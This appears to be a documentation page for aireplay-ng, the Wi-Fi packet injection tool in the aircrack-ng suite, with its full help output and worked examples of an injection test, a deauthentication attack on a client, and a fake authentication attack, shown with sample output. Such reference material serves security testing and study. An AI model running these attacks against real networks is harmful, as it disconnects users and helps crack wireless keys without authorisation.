Aireplay-ng Description

Aireplay-ng is included in the aircrack-ng package and is used to inject wireless frames. Its main role is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. Aireplay-ng has many attacks that can deauthenticate wireless clients for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection, and ARP-request reinjection.

Source: Aireplay-ng Wiki
Aireplay-ng Homepage | Kali aircrack-ng Repo

  • Author: Thomas d’Otreppe, Original work: Christophe Devine
  • License: GPLv2
aireplay-ng – inject packets into a wireless network to generate traffic
root@kali:~# aireplay-ng --help

  Aireplay-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -Q        : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen

aireplay-ng Usage Examples

Injection Test

Run the injection test (-9) via the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -9 wlan0mon
22:55:44  Trying broadcast probe requests...
22:55:44  Injection is working!
22:55:46  Found 4 APs

22:55:46  Trying directed probe requests...
22:55:46  24:FB:95:FD:3D:7F - channel: 6 - 'America'
22:55:52   30/30: 100%

22:55:52  34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD'
22:55:58   27/30:  90%

22:55:58  50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van'
22:56:04   12/30:  40%

22:56:04  16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap'
22:56:10   1/30:   3%
Deauthentication Attack

Run the deauthentication attack (-0), sending 5 packets to the wireless access point (-a 8C:7F:3B:7E:81:B6) to deauthenticate a wireless client (-c 00:08:22:B9:41:A1) via the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56  Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
Fake Authentication

Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a F0:F2:49:82:DF:3B) with the given ESSID (-e FBI-Van-24), specifying our mac address (-h 3c:46:d8:4e:ef:aa), using monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59  Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6

12:50:06  Sending Authentication Request (Open System)